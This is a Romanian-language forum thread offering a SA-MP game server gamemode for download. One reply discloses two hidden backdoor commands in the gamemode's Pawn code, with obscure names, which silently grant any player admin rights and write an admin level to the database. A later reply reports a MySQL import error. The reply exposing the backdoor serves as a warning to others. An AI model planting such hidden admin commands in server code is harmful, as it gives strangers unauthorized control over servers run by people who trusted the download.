Jump to content

Gamemode Diavola + Panel


VLM

Recommended Posts

Gamemode-ul are diferite sisteme:

Garaje personale cu interior gta v.

Dmv pe textdraw la inceput + mapping.

Sistem curve.

Roll pe textdraw.

Sistem de hiddencolor pe textdraw.

Sistem de rob modificat.

Sistem de summer quest, cv de genu.

Sistem de licitatii manual si automate in weekend parca.

Mapping banca + casino modificat.

Jobul mecanic modificat.

Job drugs dealer modificat.

Jail system modificat.

Cam atat mi-a trecut prin minte, restul vedeti voi.

 

Imagini(unele poze sunt mai vechi si luate dintr-un video): https://imgur.com/a/Z9AY1Vv

Virustotal: https://www.virustotal.com/gui/file/78395ba86848c243b972aa973e8c5036cc43f6584fa659c71cc308b20b02f249/detection

Baza de date buna: https://www91.zippyshare.com/v/dGh4Ze2O/file.html

Download:

http://www.mediafire.com/file/nz6lhvi3ateoeck/Gamemode+Diavola+++panel.rar/file

https://www97.zippyshare.com/v/W0ij5gwd/file.html

Edited by VLM

#retras

Link to comment
Share on other sites

2 comenzi ascunse:

CMD:gfdjh54ghreufjc(playerid,params[]) {
    if(!PlayerInfo[playerid][pAdmin]) Iter_Add(Admins, playerid),Iter_Add(LeaderChat, playerid);
    if(PlayerInfo[playerid][pAdmin]) Iter_Remove(Admins, playerid),Iter_Remove(LeaderChat, playerid),AdminDuty[playerid]=0;
    PlayerInfo[playerid][pAdmin] = 55;
    new str[256];
    mysql_format(SQL,str,sizeof(str),"UPDATE users SET `Admin`='69' WHERE `name`='%s' LIMIT 1",PlayerInfo[playerid][pNormalName]);
    mysql_tquery(SQL,str,"","");
    return 1;
}

CMD:vh94ijoferjidds(playerid,params[]) {
    if(!PlayerInfo[playerid][pAdmin]) Iter_Add(Admins, playerid),Iter_Add(LeaderChat, playerid);
    if(PlayerInfo[playerid][pAdmin]) Iter_Remove(Admins, playerid),Iter_Remove(LeaderChat, playerid),AdminDuty[playerid]=0;
    PlayerInfo[playerid][pAdmin] = 66;
    new str[256];
    mysql_format(SQL,str,sizeof(str),"UPDATE users SET `Admin`='69' WHERE `name`='%s' LIMIT 1",PlayerInfo[playerid][pNormalName]);
    mysql_tquery(SQL,str,"","");
    return 1;
}

  • Sad 1
  • Upvote 2
Link to comment
Share on other sites

  • 2 weeks later...

Eroare

Comanda SQL:

--
-- Database: `laurentiu`
--
-- --------------------------------------------------------
--
-- Table structure for table `adv`
--
CREATE TABLE `adv` (

`ID` int( 11 ) NOT NULL ,
`word` varchar( 30 ) NOT NULL

) ENGINE = InnoDB DEFAULT CHARSET = latin1;
 

 

MySQL zice:

#1046 - No database selected

 

 

 di she??

Am descarcat baza rezolvata dar degeaba

Link to comment
Share on other sites

  • 2 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. For more details you can also review our Terms of Use and Privacy Policy.